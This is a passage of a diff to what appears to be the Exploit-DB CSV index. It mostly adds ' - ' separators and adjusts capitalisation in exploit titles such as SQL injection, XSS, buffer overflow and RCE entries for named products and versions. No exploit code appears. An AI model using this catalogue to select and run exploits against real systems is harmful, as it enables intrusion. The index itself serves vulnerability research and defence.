SA",php,webapps,0 -35186,platforms/php/webapps/35186.txt,"WikLink 0.1.3 Multiple SQL Injection Vulnerabilities",2011-01-10,"Aliaksandr Hartsuyeu",php,webapps,0 +35186,platforms/php/webapps/35186.txt,"WikLink 0.1.3 - Multiple SQL Injection Vulnerabilities",2011-01-10,"Aliaksandr Hartsuyeu",php,webapps,0 35187,platforms/php/webapps/35187.txt,"Joostina 1.3 'index.php' Cross Site Scripting Vulnerability",2011-01-08,MustLive,php,webapps,0 35188,platforms/windows/remote/35188.py,"SolarFTP 2.1.1 'PASV' Command Remote Buffer Overflow Vulnerability",2011-01-10,"John Leitch",windows,remote,0 35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0 @@ -31717,8 +31717,8 @@ id,file,description,date,author,platform,type,port 35210,platforms/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",multiple,webapps,0 35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server Remote Code Execution",2014-11-10,metasploit,java,remote,8001 35212,platforms/php/webapps/35212.txt,"XCloner Wordpress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80 -35214,platforms/multiple/webapps/35214.txt,"Subex FMS 7.4 - Unauthenticated SQLi",2014-11-11,"Anastasios Monachos",multiple,webapps,0 -35216,platforms/windows/local/35216.py,"MS Office 2007 and 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0 +35214,platforms/multiple/webapps/35214.txt,"Subex Fms 7.4 - Unauthenticated SQLi",2014-11-11,"Anastasios Monachos",multiple,webapps,0 +35216,platforms/windows/local/35216.py,"Microsoft Office 2007 and 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0 35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File (CdrTxt.dll) Off-By-One Stack Corruption Vulnerability",2014-11-12,LiquidWorm,windows,dos,0 35218,platforms/php/webapps/35218.txt,"WordPress SupportEzzy Ticket System Plugin 1.2.5 - Stored XSS Vulnerability",2014-11-12,"Halil Dalabasmaz",php,webapps,80 35219,platforms/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps,0 @@ -31730,7 +31730,7 @@ id,file,description,date,author,platform,type,port 35225,platforms/windows/remote/35225.c,"Avira AntiVir Personal Multiple Code Execution Vulnerabilities (1)",2011-01-14,D.Elser,windows,remote,0 35226,platforms/windows/remote/35226.py,"Avira AntiVir Personal Multiple Code Execution Vulnerabilities (2)",2011-01-14,D.Elser,windows,remote,0 35227,platforms/php/webapps/35227.txt,"Alguest 1.1c-patched 'elimina' Parameter SQL Injection Vulnerability",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps,0 -35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 Multiple Cross Site Scripting Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0 +35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 - Multiple Cross Site Scripting Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0 35229,platforms/windows/remote/35229.html,"Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1)",2014-11-13,yuange,windows,remote,0 35230,platforms/windows/remote/35230.rb,"Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF)",2014-11-13,"Wesley Neelen & Rik van Duijn",windows,remote,0 35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0 @@ -31741,8 +31741,8 @@ id,file,description,date,author,platform,type,port 35236,platforms/windows/local/35236.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution",2014-11-14,metasploit,windows,local,0 35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80 35238,platforms/multiple/webapps/35238.txt,"Gogs (users and repos q pararm) - SQL Injection Vulnerabilities",2014-11-14,"Timo Schmid",multiple,webapps,0 -35239,platforms/php/webapps/35239.txt,"PHPCMS 2008 V2 'data.php' SQL Injection Vulnerability",2011-01-17,R3d-D3V!L,php,webapps,0 -35240,platforms/linux/dos/35240.c,"acpid 1.0.x Multiple Local Denial of Service Vulnerabilities",2011-01-19,"Vasiliy Kulikov",linux,dos,0 +35239,platforms/php/webapps/35239.txt,"PHPCMS 2008 V2 - 'data.php' SQL Injection Vulnerability",2011-01-17,R3d-D3V!L,php,webapps,0 +35240,platforms/linux/dos/35240.c,"acpid 1.0.x - Multiple Local Denial of Service Vulnerabilities",2011-01-19,"Vasiliy Kulikov",linux,dos,0 35241,platforms/windows/remote/35241.pl,"ESTsoft ALZip 8.12.0.3 '.zip' File Buffer Overflow Vulnerability",2011-01-19,"C4SS!0 G0M3S",windows,remote,0 35242,platforms/multiple/remote/35242.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/searchView.jsp searchWord Parameter XSS",2008-04-24,Rob,multiple,remote,0 35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS",2008-04-24,Rob,multiple,remote,0 @@ -31751,7 +31751,7 @@ id,file,description,date,author,platform,type,port 35246,platforms/php/webapps/35246.py,"Joomla HD FLV Player < 2.1.0.1 - Arbitrary File Download Vulnerability",2014-11-15,"Claudio Viviani",php,webapps,0 35248,platforms/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - XSS Vulnerability",2014-11-15,"Halil Dalabasmaz",multiple,webapps,0 35251,platforms/php/webapps/35251.txt,"Pixie CMS 1.0.4 'admin/index.php' SQL Injection Vulnerability",2011-01-20,"High-Tech Bridge SA",php,webapps,0 -35252,platforms/multiple/remote/35252.php,"libxml2 2.6.x 'XMLWriter::writeAttribute()' Memory Leak Information Disclosure Vulnerability",2011-01-24,"Kees Cook",multiple,remote,0 +35252,platforms/multiple/remote/35252.php,"libxml2 2.6.x - 'XMLWriter::writeAttribute()' Memory Leak Information Disclosure Vulnerability",2011-01-24,"Kees Cook",multiple,remote,0 35253,platforms/php/webapps/35253.txt,"web@all 1.1 'url' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35254,platforms/php/webapps/35254.txt,"PivotX 2.2.2 'module_image.php' Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35255,platforms/php/webapps/35255.txt,"WordPress Uploader Plugin 1.0 'num' Parameter Cross Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0 @@ -31766,7 +31766,7 @@ id,file,description,date,author,platform,type,port 35264,platforms/php/webapps/35264.txt,"WordPress Featured Content Plugin 0.0.1 'listid' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0 -35271,platforms/php/webapps/35271.txt,"Maarch LetterBox 2.8 - Insecure Cookies (Login Bypass)",2014-11-17,"ZoRLu Bugrahan",php,webapps,0 +35271,platforms/php/webapps/35271.txt,"Maarch LetterBox 2.8 - Insecure Cookies (Login Bypass)",2014-11-17,"ZoRLu Bugrahan",php,webapps,0 35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0 35273,platforms/windows/remote/35273.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)",2014-11-17,"ryujin & sickness",windows,remote,0 35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80 @@ -31786,7 +31786,7 @@ id,file,description,date,author,platform,type,port 35289,platforms/php/webapps/35289.txt,"WordPress FCChat Widget Plugin 2.1.7 'path' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35290,platforms/php/webapps/35290.txt,"SimpGB 1.49.2 'guestbook.php' Multiple Cross Site Scripting Vulnerabilities",2011-01-26,MustLive,php,webapps,0 35291,platforms/php/webapps/35291.txt,"Vanilla Forums 2.0.16 'Target' Parameter Cross Site Scripting Vulnerability",2011-01-27,"YGN Ethical Hacker Group",php,webapps,0 -35292,platforms/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 Multiple Cross Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps,0 +35292,platforms/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 - Multiple Cross Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps,0 35293,platforms/php/webapps/35293.txt,"VirtueMart eCommerce Component 1.1.6 for Joomla! SQL Injection Vulnerability",2011-01-31,"Andrea Fabrizi",php,webapps,0 35294,platforms/php/webapps/35294.txt,"Joomla! 'com_clan_members' Component 'id' Parameter SQL Injection Vulnerability",2011-02-01,FL0RiX,php,webapps,0 35295,platforms/php/webapps/35295.txt,"Joomla Component 'com_frontenduseraccess' Local File Include Vulnerability",2011-02-01,wishnusakti,php,webapps,0 @@ -31803,7 +31803,7 @@ id,file,description,date,author,platform,type,port 35307,platforms/php/webapps/35307.py,"All In One Control Panel 1.4.1 'cp_menu_data_file.php' SQL Injection Vulnerability",2011-01-31,"AutoSec Tools",php,webapps,0 35308,platforms/windows/remote/35308.html,"Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064)",2014-11-20,"GradiusX & b33f",windows,remote,0 35309,platforms/php/webapps/35309.txt,"Betsy 4.0 'page' Parameter Local File Include Vulnerability",2011-02-02,MizoZ,php,webapps,0 -35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums <= 9.5 Multiple SQL Injection Vulnerabilities",2011-03-23,eXeSoul,asp,webapps,0 +35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums <= 9.5 - Multiple SQL Injection Vulnerabilities",2011-03-23,eXeSoul,asp,webapps,0 35311,platforms/php/webapps/35311.txt,"Octeth Oempro 3.6.4 SQL Injection and Information Disclosure Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0 35312,platforms/php/webapps/35312.txt,"Firebook 'index.html' Cross Site Scripting Vulnerability",2011-02-03,MustLive,php,webapps,0 35313,platforms/php/webapps/35313.txt,"Wordpress SP Client Document Manager Plugin 2.4.1 - SQL Injection",2014-11-21,"ITAS Team",php,webapps,80 @@ -31813,18 +31813,18 @@ id,file,description,date,author,platform,type,port 35317,platforms/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products Information Disclosure Vulnerabilities",2011-02-07,Rapid7,hardware,remote,0 35318,platforms/windows/remote/35318.c,"Cain & Abel 2.7.3 'dagc.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-02-07,d3c0der,windows,remote,0 35319,platforms/php/webapps/35319.txt,"WebAsyst Shop-Script Cross Site Scripting and HTML Injection Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 -35320,platforms/php/webapps/35320.txt,"ViArt Shop 4.0.5 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 +35320,platforms/php/webapps/35320.txt,"ViArt Shop 4.0.5 - Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0 35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0 35324,platforms/php/webapps/35324.txt,"Wordpress CM Download Manager Plugin 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps,0 35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0 35326,platforms/windows/dos/35326.cpp,"Microsoft Windows - Win32k.sys Denial of Service",2014-11-22,Kedamsky,windows,dos,0 -35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0 -35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 +35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0 +35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 - Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 'nav.html' Cross Site Scripting Vulnerability",2011-02-09,MustLive,php,webapps,0 35330,platforms/php/webapps/35330.txt,"ManageEngine ADSelfService Plus 4.4 POST Request Manipulation Security Question Weakness",2011-02-10,"Core Security",php,webapps,0 35331,platforms/php/webapps/35331.txt,"ManageEngine ADSelfService Plus 4.4 EmployeeSearch.cc Multiple Parameter XSS",2011-02-10,"Core Security",php,webapps,0 -35332,platforms/php/webapps/35332.txt,"Dolphin 7.0.4 Multiple Cross Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",php,webapps,0 +35332,platforms/php/webapps/35332.txt,"Dolphin 7.0.4 - Multiple Cross Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",php,webapps,0 35333,platforms/php/webapps/35333.py,"webERP 4.0.1 'InputSerialItemsFile.php' Arbitrary File Upload Vulnerability",2011-02-10,"AutoSec Tools",php,webapps,0 35334,platforms/php/webapps/35334.txt,"RunCMS 2.2.2 'register.php' SQL Injection Vulnerability",2011-02-10,"High-Tech Bridge SA",php,webapps,0 35335,platforms/php/webapps/35335.html,"Drupal CAPTCHA Module Security Bypass Vulnerability",2011-02-11,anonymous,php,webapps,0 @@ -31840,10 +31840,10 @@ id,file,description,date,author,platform,type,port 35345,platforms/hardware/webapps/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,webapps,0 35346,platforms/php/webapps/35346.txt,"DukaPress 2.5.2 - Path Traversal",2014-11-24,"Kacper Szurek",php,webapps,0 35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 'style' Parameter Cross Site Scripting Vulnerability",2011-02-12,"AutoSec Tools",php,webapps,0 -35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 Multiple Cross Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0 -35349,platforms/php/webapps/35349.txt,"Gollos 2.8 Multiple Cross Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 +35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0 +35349,platforms/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 35350,platforms/php/webapps/35350.txt,"Wikipad 1.6.0 - Cross Site Scripting, HTML Injection, and Information Disclosure Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 -35351,platforms/php/webapps/35351.txt,"Photopad 1.2 Multiple Cross Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 +35351,platforms/php/webapps/35351.txt,"Photopad 1.2 - Multiple Cross Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 35352,platforms/multiple/remote/35352.rb,"Ruby on Rails 3.0.5 'WEBrick::HTTPRequest' Module HTTP Header Injection Vulnerability",2011-02-16,"Jimmy Bandit",multiple,remote,0 35353,platforms/php/webapps/35353.txt,"GetSimple CMS 2.03 'admin/upload-ajax.php' Remote Arbitrary File Upload Vulnerability",2011-02-15,"s3rg3770 and Chuzz",php,webapps,0 35354,platforms/php/dos/35354.txt,"PHP 5.3.5 'grapheme_extract()' NULL Pointer Dereference Denial Of Service Vulnerability",2011-02-17,"Maksymilian Arciemowicz",php,dos,0 @@ -31853,7 +31853,7 @@ id,file,description,date,author,platform,type,port 35359,platforms/multiple/dos/35359.txt,"tcpdump 4.6.2 Geonet Decoder Denial of Service",2014-11-24,"Steffen Bauch",multiple,dos,0 35360,platforms/php/webapps/35360.txt,"WSN Guest 1.24 'wsnuser' Cookie Parameter SQL Injection Vulnerability",2011-02-18,"Aliaksandr Hartsuyeu",php,webapps,0 35361,platforms/php/webapps/35361.txt,"Escort Directory CMS SQL Injection Vulnerability",2011-02-19,NoNameMT,php,webapps,0 -35362,platforms/php/webapps/35362.txt,"Batavi 1.0 Multiple Local File Include and Cross Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0 +35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Include and Cross Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0 35363,platforms/windows/dos/35363.txt,"TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF",2014-11-25,LiquidWorm,windows,dos,0 35364,platforms/multiple/remote/35364.txt,"IBM Lotus Sametime stconf.nsf/WebMessage messageString Parameter XSS",2011-02-21,"Dave Daly",multiple,remote,0 35365,platforms/php/webapps/35365.py,"phpMyRecipes 1.2.2 - (dosearch.php, words_exact param) SQL Injection",2014-11-25,bard,php,webapps,80 @@ -31865,12 +31865,12 @@ id,file,description,date,author,platform,type,port 35372,platforms/hardware/webapps/35372.rb,"Arris VAP2500 Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80 35373,platforms/php/webapps/35373.txt,"WordPress GD Star Rating Plugin 1.9.7 'wpfn' Parameter Cross Site Scripting Vulnerability",2011-02-22,"High-Tech Bridge SA",php,webapps,0 35374,platforms/php/webapps/35374.txt,"IBM Lotus Sametime Server 8.0 'stcenter.nsf' Cross Site Scripting Vulnerability",2011-02-22,andrew,php,webapps,0 -35375,platforms/php/webapps/35375.txt,"Vanilla Forums 2.0.17.x 'p' Parameter Cross Site Scripting Vulnerability",2011-02-22,"Aung Khant",php,webapps,0 +35375,platforms/php/webapps/35375.txt,"Vanilla Forums 2.0.17.x - 'p' Parameter Cross Site Scripting Vulnerability",2011-02-22,"Aung Khant",php,webapps,0 35376,platforms/php/webapps/35376.txt,"mySeatXT 0.164 'lang' Parameter Local File Include Vulnerability",2011-02-16,"AutoSec Tools",php,webapps,0 35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0 35378,platforms/php/webapps/35378.txt,"Wordpress DB Backup Plugin - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80 35379,platforms/windows/dos/35379.go,"Elipse E3 HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80 -35380,platforms/php/remote/35380.rb,"Pandora FMS SQLi Remote Code Execution",2014-11-26,metasploit,php,remote,80 +35380,platforms/php/remote/35380.rb,"Pandora Fms SQLi Remote Code Execution",2014-11-26,metasploit,php,remote,80 35381,platforms/php/webapps/35381.txt,"xEpan 1.0.1 - CSRF Vulnerability",2014-11-26,"High-Tech Bridge SA",php,webapps,80 35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0 35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 Traceroute Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80 @@ -31886,16 +31886,16 @@ id,file,description,date,author,platform,type,port 35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerability",2014-11-28,"Parikesit , Kurawa",php,webapps,0 35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 'tagcloud' Parameter Cross Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 '.ksf' File Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0 -35399,platforms/windows/remote/35399.pl,"DivX Player 6.x '.dps' File Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0 +35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - '.dps' File Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0 35400,platforms/php/webapps/35400.txt,"BackWPup Plugin 1.4 for WordPress Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",php,webapps,0 35401,platforms/php/webapps/35401.txt,"SnapProof 'retPageID' Parameter Cross Site Scripting Vulnerability",2011-02-28,"difficult 511",php,webapps,0 35402,platforms/php/webapps/35402.txt,"Forritun Multiple SQL Injection Vulnerabilities",2011-03-02,eXeSoul,php,webapps,0 35403,platforms/linux/dos/35403.c,"Linux Kernel 2.6.x - epoll Nested Structures Local DoS",2011-03-02,"Nelson Elhage",linux,dos,0 35404,platforms/linux/dos/35404.c,"Linux Kernel 2.6.x - fs/eventpoll.c epoll Data Structure File Descriptor Local DoS",2011-03-02,"Nelson Elhage",linux,dos,0 35405,platforms/php/webapps/35405.txt,"VidiScript 'vp' Parameter Cross Site Scripting Vulnerability",2011-03-02,NassRawI,php,webapps,0 -35406,platforms/php/webapps/35406.txt,"Support Incident Tracker (SiT!) 3.62 Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0 +35406,platforms/php/webapps/35406.txt,"Support Incident Tracker (SiT!) 3.62 - Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0 35407,platforms/php/webapps/35407.txt,"phpWebSite 1.7.1 'local' Parameter Cross Site Scripting Vulnerability",2011-03-03,"AutoSec Tools",php,webapps,0 -35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 +35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 - Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 35409,platforms/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 'IPLANG' Parameter Local File Include Vulnerability",2011-03-04,"AutoSec Tools",windows,remote,0 35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 Troubleshooting/DiagnosticReport.asp HeaderWarning Parameter XSS",2011-03-07,Dionach,asp,webapps,0 @@ -31913,9 +31913,9 @@ id,file,description,date,author,platform,type,port 35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <=13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0 35424,platforms/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",php,webapps,0 35426,platforms/windows/remote/35426.pl,"Tiny Server 1.1.9 - Arbitrary File Disclosure Exploit",2014-12-02,"ZoRLu Bugrahan",windows,remote,0 -35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD exploit",2014-12-02,dash,bsd,remote,0 +35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD Exploit",2014-12-02,dash,bsd,remote,0 35428,platforms/php/webapps/35428.txt,"SQL Buddy 1.3.3 - Remote Code Execution",2014-12-02,"Fady Mohammed Osman",php,webapps,0 -35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0 +35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x - 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0 35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0 35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 'head.php' Cross Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0 35432,platforms/linux/remote/35432.txt,"Wireshark 1.4.3 - NTLMSSP NULL Pointer Dereference Denial Of Service Vulnerability",2011-03-01,"Buildbot Builder",linux,remote,0 @@ -31924,14 +31924,14 @@ id,file,description,date,author,platform,type,port 35435,platforms/php/webapps/35435.txt,"Lazyest Gallery WordPress Plugin 1.0.26 'image' Parameter Cross Site Scripting Vulnerability",2011-03-10,"High-Tech Bridge SA",php,webapps,0 35436,platforms/php/webapps/35436.txt,"Xinha 0.96 'spell-check-savedicts.php' Multiple HTML Injection Vulnerabilities",2011-03-10,"John Leitch",php,webapps,0 35437,platforms/multiple/dos/35437.pl,"Air Contacts Lite HTTP Packet Denial Of Service Vulnerability",2011-02-09,"Rodrigo Escobar",multiple,dos,0 -35438,platforms/cgi/webapps/35438.txt,"CosmoShop V10.05.00 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0 +35438,platforms/cgi/webapps/35438.txt,"CosmoShop V10.05.00 - Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0 35439,platforms/php/webapps/35439.txt,"Wordpress Nextend Facebook Connect Plugin 1.4.59 - XSS Vulnerability",2014-12-02,"Kacper Szurek",php,webapps,80 35440,platforms/osx/local/35440.rb,"Mac OS X IOKit Keyboard Driver Root Privilege Escalation",2014-12-02,metasploit,osx,local,0 35441,platforms/multiple/remote/35441.rb,"Tincd Post-Authentication Remote TCP Stack Buffer Overflow",2014-12-02,metasploit,multiple,remote,655 35442,platforms/hardware/webapps/35442.txt,"EntryPass N5200 - Credentials Exposure",2014-12-02,"RedTeam Pentesting",hardware,webapps,0 35443,platforms/php/webapps/35443.txt,"TYPO3 ke DomPDF Extension - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80 -35444,platforms/php/webapps/35444.txt,"LMS Web Ensino Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps,0 -35445,platforms/linux/dos/35445.txt,"OpenLDAP 2.4.x 'modrdn' NULL OldDN Remote Denial of Service Vulnerability",2011-01-03,"Serge Dubrouski",linux,dos,0 +35444,platforms/php/webapps/35444.txt,"Lms Web Ensino Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps,0 +35445,platforms/linux/dos/35445.txt,"OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service Vulnerability",2011-01-03,"Serge Dubrouski",linux,dos,0 35446,platforms/windows/remote/35446.pl,"Windows Movie Maker 2.1.4026 '.avi' File Remote Buffer Overflow Vulnerability",2011-03-10,KedAns-Dz,windows,remote,0 35447,platforms/php/webapps/35447.txt,"Google Document Embedder 2.5.16 - mysql_real_escpae_string bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0 35449,platforms/windows/local/35449.rb,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-12-03,"Muhamad Fadzil Ramli",windows,local,0 @@ -31957,57 +31957,59 @@ id,file,description,date,author,platform,type,port 35472,platforms/lin_amd64/local/35472.txt,"Offset2lib: Bypassing Full ASLR On 64bit Linux",2014-12-05,"Packet Storm",lin_amd64,local,0 35473,platforms/php/webapps/35473.txt,"PBBoard CMS 3.0.1 - SQL Injection",2014-12-05,"Tran Dinh Tien",php,webapps,80 35474,platforms/windows/remote/35474.py,"Windows Kerberos - Elevation of Privilege (MS14-068)",2014-12-05,"Sylvain Monne",windows,remote,0 -35475,platforms/php/webapps/35475.txt,"WordPress Sodahead Polls Plugin 2.0.2 Multiple Cross Site Scripting Vulnerabilities",2011-03-17,"High-Tech Bridge SA",php,webapps,0 -35476,platforms/php/webapps/35476.txt,"WordPress Rating-Widget Plugin 1.3.1 Multiple Cross Site Scripting Vulnerabilities",2011-03-17,"Todor Donev",php,webapps,0 -35477,platforms/php/webapps/35477.txt,"XOOPS 2.x Multiple Cross Site Scripting Vulnerabilities",2011-03-18,"Aung Khant",php,webapps,0 +35475,platforms/php/webapps/35475.txt,"WordPress Sodahead Polls Plugin 2.0.2 - Multiple Cross Site Scripting Vulnerabilities",2011-03-17,"High-Tech Bridge SA",php,webapps,0 +35476,platforms/php/webapps/35476.txt,"WordPress Rating-Widget Plugin 1.3.1 - Multiple Cross Site Scripting Vulnerabilities",2011-03-17,"Todor Donev",php,webapps,0 +35477,platforms/php/webapps/35477.txt,"XOOPS 2.x - Multiple Cross Site Scripting Vulnerabilities",2011-03-18,"Aung Khant",php,webapps,0 35478,platforms/linux/dos/35478.txt,"MHonArc 2.6.16 Tag Nesting Remote Denial of Service Vulnerability",2010-12-21,anonymous,linux,dos,0 35479,platforms/php/webapps/35479.txt,"Web Poll Pro 1.0.3 'error' Parameter HTML Injection Vulnerability",2011-03-19,Hector.x90,php,webapps,0 35480,platforms/php/webapps/35480.txt,"Online store php script Multiple Cross Site Scripting and 